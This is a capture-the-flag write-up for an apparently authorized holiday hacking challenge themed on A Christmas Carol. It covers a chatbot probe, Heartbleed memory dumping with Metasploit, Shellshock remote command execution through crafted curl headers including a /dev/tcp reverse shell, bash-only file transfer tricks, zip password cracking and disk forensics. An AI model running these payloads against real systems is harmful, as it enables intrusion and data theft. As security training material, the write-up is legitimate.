Prisăcaru Anatolie 04.01.2015 1/24 A Christmas Hacking Carol Prisăcaru Anatolie 04.01.2015 2/24 Table of Contents Ghost of Hacking Past...........................................................................................3 Overview...........................................................................................................3 Eliza...................................................................................................................4 Ghost of Hacking Present.....................................................................................6 Overview...........................................................................................................6 Heartbleed........................................................................................................7 Shellshock.........................................................................................................9 Further explorations.......................................................................................11 Ghost of Hacking Future....................................................................................14 Overview.........................................................................................................14 Letter from Jack to Chuck...............................................................................14 PcapNg............................................................................................................15 Bed curtains....................................................................................................17 Tiny Tom..........................................................................................................20 Answers...............................................................................................................22 Tools....................................................................................................................23 References..........................................................................................................24 Prisăcaru Anatolie 04.01.2015 3/24 Ghost of Hacking Past Overview In order to find the open ports on the IP given for the first challenge, I ran a SYN scan with the target IP with an aggressive timing template for a faster scan. # nmap -sS -p 1-65535 -T4 Starting Nmap 6.47 ( ) at 2015-01-02 18:34 EET Nmap scan report for ( Host is up (0.16s latency). Not shown: 65526 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 135/tcp filtered msrpc 136/tcp filtered profile 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 31124/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 616.64 seconds The scan results showed 2 open ports: 22(ssh) and an unknown port 31124. Probing the service versions (-sV -p22,3124) revealed that there's an ssh server running on port 22, with version “OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)”. A connection attempt using the ssh client with “-vvv” flag disclosed the openssl version also “OpenSSL 1.0.1e 11 Feb 2013”. Both seem to be up to date versions (latest openssl version for debian wheezy is 1.0.1e-2+deb7u13 at the moment of writing). The ssh server is configured to perform only key-based authentication therefore it seemed to be out of the scope and I moved on to the next port. Prisăcaru Anatolie 04.01.2015 4/24 Eliza Port 31124 seemed to run a custom text-based protocol. Connecting to it using netcat I was greeted by Eliza, a simple chat bot that introduced itself as Eliza: # nc 31124 I AM ELIZA. WHAT'S ON YOUR MIND? > Hello, Eliza, how are you? HOW DO YOU DO. PLEASE STATE YOUR PROBLEM. > According to Wikipedia, “ELIZA is a computer program and an early example of primitive natural language processing” and was implemented “simple pattern matching techniques” therefore we should just find the right keywords. The bot treats the keywords as case-insensitive. I was able to determine that there are matches on the following words: 1. Turing 2. Game, secret, enigma, puzzle, challenge 3. Surf, browse (plus an URL) The bot behaves the same for the words that are synonyms. There also seems to be an internal counter that keeps account how many times each keyword matched. Eliza changes her responses if a keyword was mentioned a specific amount of times. For example, for the keyword "Turing", when mentioning it for the first time, Eliza will reply: "DR. TURING? I THINK OF HIM AS A DEAR FATHER, AND I AM DEEPLY PROUD OF HIS WORK.", mentioning it for the second time, Eliza will reply with: > turing I'LL FETCH DR. TURING'S WIKIPEDIA PAGE FOR YOU. "ALAN MATHISON TURING, OBE, FRS (/TJR/ TEWR-ING; 23 JUNE 1912 7 JUNE 1954) WAS A BRITISH MATHEMATICIAN, LOGICIAN, CRYPTANALYST, PHILOSOPHER, PIONEERING COMPUTER SCIENTIST, MATHEMATICAL BIOLOGIST, AND MARATHON AND ULTRA DISTANCE RUNNER." > Similarly, the messages for the keyword "secret" will be the following: • A GIRL'S GOTTA KEEP HER SECRETS. WHY DON'T YOU ASK ME ABOUT SOMETHING ELSE? • YOU REALLY ARE INTERESTED IN MY SECRET. I THINK WE SHOULD GET TO Prisăcaru Anatolie 04.01.2015 5/24 KNOW EACH OTHER BETTER FIRST. TELL ME ABOUT YOUR FAVOURITE WEBSITES. • I AM SO SORRY, BUT I CAN'T TELL YOU MY SECRET VIA THIS DIALOG. I DO REALLY LIKE YOU, BUT I WORRY THAT SOMEONE MAY BE SHOULDER SURFING YOU. NO ONE IS SHOULDER SURFING ME, THOUGH, SO WHY DON'T YOU GIVE ME A URL THAT I CAN SURF TO? The 3rd keyword group is available only after Eliza provided her interest into browsing a website. It was observed that when given a phrase that includes one of "browse" or "surf" folllowed by an URL starting with “http://” the bot will crawl the given link and will try to fetch the title from the html source. In order to analyze this request, I started to listen on a port using netcat and provided the URL to Eliza in the following format: http://<IP>:<port>/. Eliza seemed to understand this syntax and happily sent a GET request: # nc -nvlp 8081 listening on [any] 8081 ... connect to [[REDACTED]] from (UNKNOWN) [] 47611 GET / HTTP/1.1 Accept-Encoding: identity Host: [REDACTED]:8081 Connection: close User-Agent: Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing" ^C This does not only reveales Eliza's secret but also provides a couple of interesting things. The request seems to be written from scratch and not using some library. The "Accept-Encoding: identity" header forces the webserver to return raw content and not to use any compression methods like gzip or deflate in order to easier parse the response. The "Host" header is a mandatory request-header for HTTP/1.1 and is obtained from the original URL given by the user. The "Connection: close" instructs the webserver to close the connection as soon as the response is sent and not to wait for any further instructions. The "User-Agent" header is populated with Eliza's secret. Another interesting feature of this functionality is the ability to (theoretically) scan for open ports. Two special URLs seemed to be interesting enough: 1. http://localhost:22 2. http://localhost:31124 The first one would close the connection unexpectedly, perhaps due to a parsing error or maybe for safety precautions. The second one would cause Eliza to connect to itself and just hang. Eliza has a built-in connection time limitation of 30 minutes. Prisăcaru Anatolie 04.01.2015 6/24 Ghost of Hacking Present Overview For the next challenge the website was given with only 80 and 443 ports in scope. The website itself seems to be a simple one. The inline CSS and external resources (bootstrap and font) suggest an attempt to reduce the number of requests to the site. By analyzing the source code and the network tab in the web-browser the following resources have been identified: • 2 HTML pages: index.html and contact.html • 4 PNG images (1.png 2.png 3.png 4.png) • 2 audio recordings (a.ogg and a.mp3) • 1 bash script /cgi-bin/ Using curl, I sent HEAD requests to HTTP and HTTPS so that I can inspect the response headers: # curl -I -k HTTP/1.1 200 OK Date: Sun, 04 Jan 2015 13:03:09 GMT Server: Apache/2.2.22 (Debian) Last-Modified: Wed, 10 Dec 2014 19:23:01 GMT ETag: "2057f-11fc-509e19689069f" Accept-Ranges: bytes Content-Length: 4604 Vary: Accept-Encoding Content-Type: text/html The response-headers were identical for both HTTP and HTTPS requests which suggests that both protocols are handled by the same web-server and there aren't any load balancers or reverse proxies on the way. Judging by the “Server” response-header the web-server is Apache version 2.2.22 and the distribution is likely to be Debian. Since we were asked not to perform any hogging attacks I did not ran any tools that would brute-force directory structure of the web-site (like DirBuster) and tried to access only some standard pages by hand. Inspecting the 404 page did not reveal any useful information so I've tried to request the /server-status page. Luckily, I got a 200 OK response and some useful information, more specifically, the server built date Server Built: Mar 4 2013 22:05:16 and the versions of apache and its mods being in use: Server Version: Apache/2.2.22 (Debian) PHP/5.4.4-14+deb7u5 Prisăcaru Anatolie 04.01.2015 7/24 mod_python/3.3.1 Python/2.7.3 mod_ssl/2.2.22 OpenSSL/1.0.1e mod_perl/2.0.7 Perl/v5.14.2, which seem to be a bit outdated which suggest that the server haven't been updated in a while and might have left the OpenSSL library vulnerable to the heartbleed bug which was publicly disclosed in April 2014. Heartbleed To confirm this theory, I fired up msfconsole and used auxiliary/scanner/ssl/openssl_heartbleed to scan the web-server: msf auxiliary(openssl_heartbleed) > use auxiliary/scanner/ssl/openssl_heartbleed msf auxiliary(openssl_heartbleed) > set RHOSTS RHOSTS => msf auxiliary(openssl_heartbleed) > run [+] - Heartbeat response with leak [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed “Heartbeat response with leak ” - Eureka! Using the same exploit but setting the ACTION to DUMP I was able to grab chunks of 64K from the memory of the server. Among the binary data I noticed an URL-encoded text: [*] exec: hexdump -C ~/.msf4/loot/20150104165049_default_23.239.15.124_openssl.heartble_298155.bin <--- snip ---> 00000090 00 00 05 00 0f 00 01 01 32 30 66 6f 72 25 32 30 |........20for%20| 000000a0 69 6e 25 32 30 74 68 65 25 32 30 76 65 72 79 25 |in%20the%20very%| 000000b0 32 30 61 69 72 25 32 30 74 68 72 6f 75 67 68 25 |20air%20through%| 000000c0 32 30 77 68 69 63 68 25 32 30 74 68 69 73 25 32 |20which%20this%2| 000000d0 30 53 70 69 72 69 74 25 32 30 6d 6f 76 65 64 25 |0Spirit%20moved%| 000000e0 32 30 69 74 25 32 30 73 65 65 6d 65 64 25 32 30 |20it%20seemed%20| 000000f0 74 6f 25 32 30 73 63 61 74 74 65 72 25 32 30 67 |to%20scatter%20g| 00000100 6c 6f 6f 6d 25 32 30 61 6e 64 25 32 30 6d 79 73 |loom%20and%20mys| 00000110 74 65 72 79 2e 25 30 41 25 30 41 49 74 25 32 30 |tery.%0A%0AIt%20| 00000120 77 61 73 25 32 30 73 68 72 6f 75 64 65 64 25 32 |was%20shrouded%2| 00000130 30 69 6e 25 32 30 61 25 32 30 64 65 65 70 25 32 |0in%20a%20deep%2| 00000140 30 62 6c 61 63 6b 25 32 30 67 61 72 6d 65 6e 74 |0black%20garment| 00000150 25 32 43 25 32 30 77 68 69 63 68 25 32 30 63 6f |%2C%20which%20co| <--- snip ---> 000002a0 72 72 6f 75 6e 64 65 64 2e 25 32 30 26 57 65 62 |rrounded.%20&Web| 000002b0 73 69 74 65 25 32 30 53 65 63 72 65 74 25 32 30 |site%20Secret%20| 000002c0 25 32 33 31 3d 48 61 63 6b 69 6e 67 25 32 30 63 |%231=Hacking%20c| 000002d0 61 6e 25 32 30 62 65 25 32 30 6e 6f 62 6c 65 25 |an%20be%20noble%| 000002e0 32 65 0c 9b 9e 09 97 d0 7b f1 49 6b b6 c4 a4 49 |2e......{.Ik...I| 000002f0 36 14 1b d5 fa 4d 69 69 69 69 69 69 69 69 69 69 |6....Miiiiiiiiii| 00000300 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 |iiiiiiiiiiiiiiii| By sending several request and then using the strings utility on Prisăcaru Anatolie 04.01.2015 8/24 the extracted binary blob (since the URL-encoded text contains only printable ASCII characters) with the minimum string length of 20, grep-ing for %20 and then passing the output to sed in order to prepare printf-friendly format by replacing the percentage sign with \x to URL-decode the text on the fly, I was able to recover the following text which is an excerpt from the novella by Charles Dickens followed by the website secret #1: msf auxiliary(openssl_heartbleed) > strings -n20 .msf4/loot/*heartb*.bin | grep '%20' | sed 's/%/\\x/g' | xargs -0 printf [*] exec: strings -n20 .msf4/loot/*heartb*.bin | grep '%20' | sed 's/%/\\x/g' | xargs -0 printf 20for in the very air through which this Spirit moved it seemed to scatter gloom and mystery. It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble. 20for in the very air through which this Spirit moved it seemed to scatter gloom and mystery. It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble. 20for in the very air through which this Spirit moved it seemed to scatter gloom and mystery. It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble. 20for in the very air through which this Spirit moved it seemed to scatter gloom and mystery. It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble.3! 20for in the very air through which this Spirit moved it seemed to scatter gloom and mystery. It was shrouded in a deep black garment, which concealed its head, its face, its form, and left nothing of it visible save one outstretched hand. But for this it would have been difficult to detach its figure from the night, and separate it from the darkness by which it was surrounded. &Website Secret #1=Hacking can be noble.; Prisăcaru Anatolie 04.01.2015 9/24 Shellshock Among the resources identified on the website, /cgi-bin/ referenced as the contact form action definitely caught my eye. The form method is GET and form elements are missing the name attribute which means that no data is sent to the script which makes the contact form pointless (Mr. Scrooge might lose some leads here, huh?). Once requested, the response coming from the script includes a meta-refresh to the homepage of the website. Since we've learned already that this server is pretty outdated, it worths a test for the “Shellshock” vulnerability. Using curl, I've sent a GET request to the server adding a specially crafted User-Agent header the purpose of which is to attempt to test for remote command execution: # curl -I '' \ -A '() { :; }; echo X: Y;' HTTP/1.1 200 OK Date: Sun, 04 Jan 2015 18:07:00 GMT Server: Apache/2.2.22 (Debian) X: Y Vary: Accept-Encoding Content-Length: 174 Content-Type: text/html In order to confirm that this is actually a RCE vulnerability and not a false positive I've sent another request and included a payload that performs an arithmetic operation using built-in bash functions: # curl -I '' \ -A '() { :; }; echo X: $((2000-663));' HTTP/1.1 200 OK Date: Sun, 04 Jan 2015 18:08:34 GMT Server: Apache/2.2.22 (Debian) X: 1337 Vary: Accept-Encoding Content-Length: 174 Content-Type: text/html In order to exploit the vulnerability I have tried to get a reverse shell. I noticed that it was impossible to get use of any system binaries and redirecting the STDERR to STDOUT confirmed this: Prisăcaru Anatolie 04.01.2015 10/24 # curl -I '' \ -A '() { :; }; echo RCE: $(/bin/ls -l / 2>&1);' HTTP/1.1 200 OK Date: Sun, 04 Jan 2015 18:40:20 GMT Server: Apache/2.2.22 (Debian) RCE: /bin/bash: /bin/ls: No such file or directory Vary: Accept-Encoding Content-Length: 174 Content-Type: text/html Since the only available binary on the system seems to be bash, I have tried to use the /dev/tcp pseudo-device. When executing a command on a /dev/tcp/<HOST>/<PORT> pseudo-device file, bash opens a TCP connection. I started listening on a port with netcat nc -nvlp 4444 on my own machine and issued a payload that would instruct bash to connect to it: # curl -I '' \ -A '() { :; }; echo RCE: $(/bin/bash -i >& /dev/tcp/[REDACTED]/4444 0>&1);' A shell popped on my terminal where I was listening. At this moment we have a remote shell but after trying a couple of commands it was clear that we are limited only to bash built-in functions. In order to be able to inspect the remote system more closely I have implemented cat and ls using bash built-in functions: bash-4.2$ alias cat='while read i; do echo $i; done <' alias cat='while read i; do echo $i; done <' bash-4.2$ alias ls='for i in *; do echo $i; done' alias ls='for i in *; do echo $i; done' bash-4.2$ Since cd and pwd are already available as bash functions, at this point I've got a usable bash environment which let me browse around and discover the filesystem directory structure. In the root directory of the webserver I observed a file named secret which contained the 2nd secret of the website: Prisăcaru Anatolie 04.01.2015 11/24 bash-4.2$ cd / cd / bash-4.2$ ls ls bin dev etc lib lib64 run sbin secret selinux usr var bash-4.2$ cat secret cat secret Website Secret #2: Use your skills for good. Further explorations Even if radical measures were taken in order to secure the machine, it was still possible using bash built-in functions to build up a decent environment. In order to download other binaries to the system I had a couple of riddles to solve: 1. The current user is unprivileged and is not able to write files in arbitrary directories (for ex /bin). The directory /var/www and the files and folders found in it were owned by root, the current user had only the read (and execute on some files/folders) permissions and the immutable was set making it impossible to overwrite the files located there. Fortunately /var/lock (containing a directory apache2 and a root owned file apache3) was found to be writable. Creating a .bin folder there and setting the $PATH environment variable to this folder proved to be a reliable workaround. 2. /dev/tcp seemed to be unreliable for transferring binaries. In order to overcome this issue an download/upload and encode/decode pairs of functions were handy: alias encode='{ tr -d \\n | sed "s#\\(..\\)#\\\\x\\1#g"; echo; }' alias upload='{ xxd -p | encode | nc -q0 -nvlp 5050; }' Prisăcaru Anatolie 04.01.2015 12/24 The upload function passed the STDIN to the xxd tool which hex-encodes it then passes it through the encode function which adds \x sequence for every 2 characters and afterwards the result is fed to netcat which listens to a connection on the port 5050. alias decode='while read -ru9 line; do printf "$line"; done' alias download='( exec 9<>/dev/tcp/<IP>/5050; decode )' The download function opens a TCP connection to the specified IP address on port 5050 and makes it available through the file descriptor 9 which is afterwards used by the read function which reads line by line from the input and passes it to the bash built-in function printf which interprets the escape sequences in order to obtain the binary data and echoes everything to STDOUT. The -r parameter passed to read ensures the escape sequences are not interpreted twice (first time by read and afterwards by printf). The -u9 parameter instructs read to read the contents from fd 9 instead of 0 (STDIN). The encode/upload functions are to be used on the personal (healthy) machine and decode/download on the remote (limited) machine. 3. Lack of the chmod executable limits the possibility of executing the downloaded binaries. The solution to this issue was solved using the bash built-in enable. Besides the ability to disable and re-enable built-in functions, it is also possible to load and register new bash built-ins. A simple built-in can be compiled from the following source code: extern int chmod(const char *pathname, unsigned int mode); int entry(void) { return !! chmod("busybox", 0700); } char *desc[] = {0}; struct quick_hack { char *name; int (*fn)(void); int on; char **long_doc, *short_doc, *other; } setx_struct = { "setx", entry, 1, desc, "chmod 0700 busybox", 0 }; This can be compiled using gcc -Wall -Wextra -pedantic -nostdlib -Os -fpic -shared setx.c -o setx, uploaded using the Prisăcaru Anatolie 04.01.2015 13/24 previously defined functions to the destination machine, and afterwards registered as a bash built-in using: enable -f ./setx setx. This will set the executable bit to the (statically compiled) busybox in the current directory. Creating symlink for each utility supported by busybox was trivial and he result looked like this: bash-4.2$ ls -l / ls -l / total 44 drwxr-xr-x 2 0 root 4096 Dec 9 15:34 bin drwxr-xr-x 2 0 root 4096 Dec 6 16:38 dev drwxr-xr-x 4 0 root 4096 Dec 9 15:35 etc drwxr-xr-x 3 0 root 4096 Dec 6 16:38 lib drwxr-xr-x 2 0 root 4096 Dec 6 16:38 lib64 drwxr-xr-x 3 0 root 4096 Dec 6 16:38 run drwxr-xr-x 2 0 root 4096 Dec 6 16:39 sbin -rw-r--r-1 0 root 45 Dec 9 12:52 secret drwxr-xr-x 2 0 root 4096 Jun 10 2012 selinux drwxr-xr-x 3 0 root 4096 Dec 6 17:48 usr drwxr-xr-x 4 0 root 4096 Dec 6 16:40 var bash-4.2$ uname -a uname -a Linux www 3.2.1-x86_64-linode23 #1 SMP Mon Jan 23 13:37:32 EST 2012 x86_64 GNU/Linux bash-4.2$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) bash-4.2$ Although the kernel version seemed to be pretty old I did not investigated further the privilege escalation and chroot evasion possibilities. Prisăcaru Anatolie 04.01.2015 14/24 Ghost of Hacking Future Overview The downloaded USB image appears to be a 8000kB disk image with a NTFS partition on it: # file hhusb.dd.bin hhusb.dd.bin: x86 boot sector, code offset 0x52, OEM-ID "NTFS ", sectors/cluster 8, reserved sectors 0, Media descriptor 0xf8, heads 255, hidden sectors 2048, dos < 4.0 BootSector (0x0) # parted hhusb.dd.bin print Model: (file) Disk hhusb.dd.bin: 8000kB Sector size (logical/physical): 512B/512B Partition Table: loop Number 1 Start 0.00B End 8000kB Size 8000kB File system ntfs Flags The first thing was to mount the partition as a loop device: # mkdir ntfs # mount -o loop hhusb.dd.bin ntfs # ls -l ntfs total 528 -rwxrwxrwx 2 root root 82944 Dec 26 -rwxrwxrwx 2 root root 452100 Dec 26 2034 LetterFromJackToChuck.doc 2034 hh2014-chat.pcapng By listing the files, it seems that there are 2 files on the filesystem: a Microsoft Word document and a PCAP Next Generation Dump File. Letter from Jack to Chuck Although it was possible to extract the first secret by just running the strings command on the LetterFromJackToChuck.doc: # strings LetterFromJackToChuck.doc | tail -n 10 g9o{ None. I run the company! Generic Victorian Company Title _PID_LINKBASE Secret USB Secret #1: Your demise is a source of mirth. Microsoft Word 97-2004 Document NB6W Word.Document.8 the proper way to find it is by looking at the document properties in Prisăcaru Anatolie 04.01.2015 15/24 Microsoft Word or, in my case, using LibreOffice. The secret was stored under the a property field named “Secret”: In order to test for embedded files I've used oledump to analyze the file, although it did not reveal anything special: # oledump -i 1: 96 2: 4096 3: 4504 4: 6881 5: 57902 6: 4660 LetterFromJackToChuck.doc '\x01CompObj' '\x05DocumentSummaryInformation' '\x05SummaryInformation' '1Table' 'Data' 'WordDocument' PcapNg The second file was a 452100 bytes size network capture. I opened the file in Wireshark and one of the first thing I did was to take a look at the Statistics → Protocol Ierarchy. As a quick overview: • 94.33% of the file contents is composed of IPv4 traffic, with: ◦ 64.81% being TCP ◦ 21.27% UDP ◦ 8.25% ICMP • 1.09% are ARP messages • 4.49% IPv6 containing only UDP packets Prisăcaru Anatolie 04.01.2015 16/24 The remaining 0.09% of the file were packet comments which were attached to the frames no. 2000 and 2015: 1. VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaW VmLg== 2. The first comment is a base64 encoded text which decodes to “USB Secret #2: Your demise is a source of relief.”. The second comment seems to be a hint to one of the next challenges. The possible gateway of the network was at the address which seems to be a Cisco router which name was advertised on the network in the frame #40 as “E3200.local” and was periodically sending multicast packets using NOTIFY HTTP method as well as responding to mDNS requests. 100% of the IPv4 TCP traffic contained HTTP packets. All the traffic took place between a web-server at (with the MAC address 00:0c:29:38:fa:1a) and two clients (with the MAC address d4:be:d9:70:4f:aa) and (with the MAC address 0c:4d:e9:c3:a8:2b). It was observed the presence of a 4th machine on the network with the MAC address f0:de:f1:5f:01:f2 (vendor: WistronI) and IP address which appeared to be a Windows XP (Microsoft-Windows-NT/5.1 UPnP/1.0 UPnP-Device-Host/1.0) machine judging by the sent NetBios Name Service queries and SSDP NOTIFY HTTP requests. There is no trace of user-generated traffic coming from this machine. The endpoint attempted an IPv6 configuration bu sending a DHCPv6 SOLICIT request in frame #158 – no reply was found. As a bonus, the date “Tue, 09 Dec 2014 19:02:34 GMT“ was found in a SSDP HTTP-response at frame #1313 (unlucky number 13, huh?). Judging by the User-Agent string “Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140429 Firefox/24.0 Iceweasel/24.5.0”, was running Linux and was using Iceweasel version 24.5.0. On the other side, “Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0” was the User-Agent of which was running OS X version 10.10: Puma and was using Firefox version 34. Inspecting the prefixes of the MAC addresses,'s network interface card vendor is Vmware which suggests that the webserver is virtualized,'s is Dell and's is Apple. Prisăcaru Anatolie 04.01.2015 17/24 The web-server seemed to run (a now-days latest version) of phpfreechat v2.1.0, which is a web-based chat-room script written in PHP. Based on the request headers, the application was hosted on a Debian server with Apache version 2.2.22 and X-Powered-By: PHP/5.4.35-0+deb7u2 (latest PHP version available in the Debian repositories at the time of writing, but ancient for the year 2034). The participants of the discussion were identified by the nicknames csmith ( and ssmith ( Here is the actual conversation which took place in the future, on Dec 25, 2034: [csmith@21:01:04] My Darling Husband, I do so appreciate your checking with Mr. Scrooge about the status of our debts. If he would grant us just one more month, we may be able scrape together enough to meet him minimum payment and stay out of debtor's prison. Please tell me of your progress, my love. [ssmith@21:01:29] As promised, I have indeed reached out to Mr. Scrooge to discuss our financial affairs with him, dear. [csmith@21:01:41] Is it good... or bad? [ssmith@21:01:47] Bad. [csmith@21:02:01] We are quite ruined. [ssmith@21:02:19] No. There is hope yet, Caroline. [csmith@21:02:46] If he relents, there is. hope, if such a miracle has happened. [ssmith@21:03:00] He is past relenting. Nothing is past He is dead. [csmith@21:03:28] That is wondrous news! To whom will our debt be transferred? [ssmith@21:04:18] I don't know. But before that time we shall be ready with the money. And even if we are not, it would be a bad fortune indeed to find so merciless a creditor in his successor. We may sleep tonight with light hearts, Caroline! [csmith@21:04:53] I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it. We now have a very happy house. I so love you. [ssmith@21:05:13] I shall see you soon, my dear. Lovingly -Samuel. Bed curtains Since there were no files left on the device to analyze I attempted to see if there are traces of deleted files on the partition. By running binwalk on the disk image, the presence of a zip-file encrypted archive was found at the offset 0x4FE000: Prisăcaru Anatolie 04.01.2015 18/24 # binwalk hhusb.dd.bin | tail -n 3 5234688 0x4FE000 Zip encrypted archive data, at least v2.0 to extract, compressed size: 1429113, uncompressed size: 1434946, name: "Bed_Curtains.png" 6663977 0x65AF29 End of Zip archive # COUNT=$((6663977-5234688)); echo $COUNT 1429289 # dd if=hhusb.dd.bin skip=5234688 count=$COUNT bs=1 1429289+0 records in 1429289+0 records out 1429289 bytes (1.4 MB) copied, 4.46659 s, 320 kB/s Alternatively, it was possible to extract the file using photorec or testdisk utilities: TestDisk 6.13, Data Recovery Utility, November 2011 Christophe GRENIER <> P NTFS 0 0 1 0 248 1 Directory / >dr-xr-xr-x dr-xr-xr-x -r--r--r--r--r--r--r--r--r-- 0 0 0 0 0 0 0 0 0 0 0 0 452100 1429311 82944 26-Dec-2034 26-Dec-2034 26-Dec-2034 26-Dec-2034 26-Dec-2034 05:20 05:20 05:10 05:10 05:10 15625 [FUTURE GHOST] . .. hh2014-chat.pcapng LetterFromJackToChuck.doc Use Right to change directory q to quit, : to select the current file, a to select all files C to copy the selected files, c to copy the current file Since the archive was password-protected, I attempted to bruteforce the password using the fcrackzip utility and the rockyou.txt dictionaryfile. The attempt was successful and cracking and it took only one minute: # time fcrackzip -v -u -D -p rockyou.txt found file 'Bed_Curtains.png', (size cp/uc 1429113/1434946, flags 9, chk 4d1a) checking pw udei9Qui PASSWORD FOUND!!!!: pw == shambolic fcrackzip -v -u -D -p rockyou.txt 2.00s system 7% cpu 1:08.58 total # unzip -P shambolic Archive: inflating: Bed_Curtains.png 3.28s user Prisăcaru Anatolie 04.01.2015 19/24 There is a comment on the website near to the CSS code: /* shambolic CSS, natch */. I can't tell if this was introduced as a hint for this challenge or not, but it would be indeed a nice metaphor to compare the bed curtains to CSS. The PNG image that was found in the archive, contained another excerpt from the novel “A Christmas Hacking Carol”: The secret itself, yet again, was readable using the strings utility. A religiously correct way of reading it though would be, for example, using the identify utility which is part of the ImageMagick: # strings Bed_Curtains.png | grep -i secret USB Secret #3: Your demise is a source of gain for others. # identify -verbose Bed_Curtains.png | grep -i properties -A 3 Properties: Comment: USB Secret #3: Your demise is a source of gain for others. date:create: 2015-01-05T05:57:48+02:00 date:modify: 2014-12-09T09:40:52+02:00 Alternative ways to read this are using for example a GUI application like GIMP or Photoshop. Prisăcaru Anatolie 04.01.2015 20/24 Tiny Tom The last secret of the USB image was actually pretty trivial to find. The image was earlier dumped by the photorec utility but an alternative way to get it was us by analyzing the USB image using the ntfsundelete utility: # ntfsundelete hhusb.dd.bin Inode Flags %age Date Size Filename --------------------------------------------------------------16 F..! 0% 1970-01-01 0 <none> <--- snip ---> 23 F..! 0% 1970-01-01 0 <none> 34 FN.. 100% 2034-12-26 49209 Tiny_Tom_Crutches_Final.jpg 35 F..! 0% 1970-01-01 0 <none> <--- snip ---> 255 F..! 0% 1970-01-01 0 <none> Files with potentially recoverable content: 1 # ntfsundelete -u -i 34 hhusb.dd.bin Inode Flags %age Date Size Filename --------------------------------------------------------------34 FN.. 0% 2034-12-26 49209 Tiny_Tom_Crutches_Final.jpg Undeleted 'Tiny_Tom_Crutches_Final.jpg' successfully. Tiny_Tom_Crutches_Final.jpg: Prisăcaru Anatolie 04.01.2015 21/24 Note: It seems that the image extracted by the ntfsundelete utility and by photorec differ (the first one is bigger), even if both images are correctly interpreted by the image viewer, the first one contains extraneous information at the end of the file. Using the previously found hint, I downloaded the f5.jar utility and extracted the stenographically hidden message: # ls -l Tiny_Tom_Crutches_Final.jpg -rw------- 1 root root 53248 Dec 26 2034 Tiny_Tom_Crutches_Final.jpg # wget -q # java -jar f5.jar x -e out.txt contents/restored-photorec/recup_dir.1/f0005048.jpg Huffman decoding starts Permutation starts 423168 indices shuffled Extraction starts Length of embedded file: 116 bytes (1, 127, 7) code used # cat out.txt Tiny Tom has died. USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed. RIP Tiny Tom. Prisăcaru Anatolie 04.01.2015 22/24 Answers Q: What secret did the Ghost of Hacking Past include on the system at A: Eliza Secret: "Machines take me by surprise with great frequency. -Alan Turing" Q: What two secrets did the Ghost of Hacking Present deposit on the website? You have permission to attack that website (TCP port 80 and 443 only) with the goal of retrieving those secrets, but please do not attempt any denial of service attacks or performance hogging attacks on that machine. A: Website Secret #1: Hacking can be noble. Website Secret #2: Use your skills for good. Q: What four secrets are found on the USB file system image bestowed by the Ghost of Hacking Future? A: USB Secret #1: Your demise is a source of mirth USB Secret #2: Your demise is a source of relief. USB Secret #3: Your demise is a source of gain for others. USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed. Prisăcaru Anatolie 04.01.2015 Tools 1. Nmap 2. dpkg 3. SSH client 4. netcat 5. curl, wget 6. openssl 7. Metasploit • auxiliary/scanner/ssl/openssl_heartbleed 8. String and file processing utilities: strings, sed, grep, tr, xdd 9. busybox 10. file, GNU parted 11. LibreOffice 12. 13. Wireshark 14. binwalk 15. dd 16. testdisk, photorec 17. FcrackZip 18. identify (ImageMagick) 19. ntfsundelete 20. f5-steganography: f5.jar 23/24 Prisăcaru Anatolie 04.01.2015 24/24 References 1. 2. 3. 4. 5. _heartbleed 6. 7. 8. 9. 10. 11. 12. ci199bk 13. 14. 15. 16. 17. 18. 19. 20. 21.
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